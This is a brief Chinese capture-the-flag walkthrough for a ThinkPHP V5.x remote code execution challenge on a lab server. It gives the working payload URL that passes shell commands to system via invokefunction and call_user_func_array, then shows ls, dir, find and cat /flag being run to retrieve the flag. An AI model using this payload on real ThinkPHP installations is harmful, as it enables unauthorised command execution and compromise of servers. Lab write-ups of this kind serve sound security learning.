题目场景: http://220.249.52.133:52904 (温馨提示:每次进入URL的端口号都不一样)
1、点击链接进入如下界面
2、百度搜索:Thinkphp V5.x 远程代码执行漏洞-POC
https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
3、把“/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l”加在后面,然后URL为:http://220.249.52.133:52904/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
4、s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
5、dir—>find / -name “*flag”
5.1 回车
6、find / -name “*flag”—>cat /flag—>回车
7、OK
flag{thinkphp5_rce}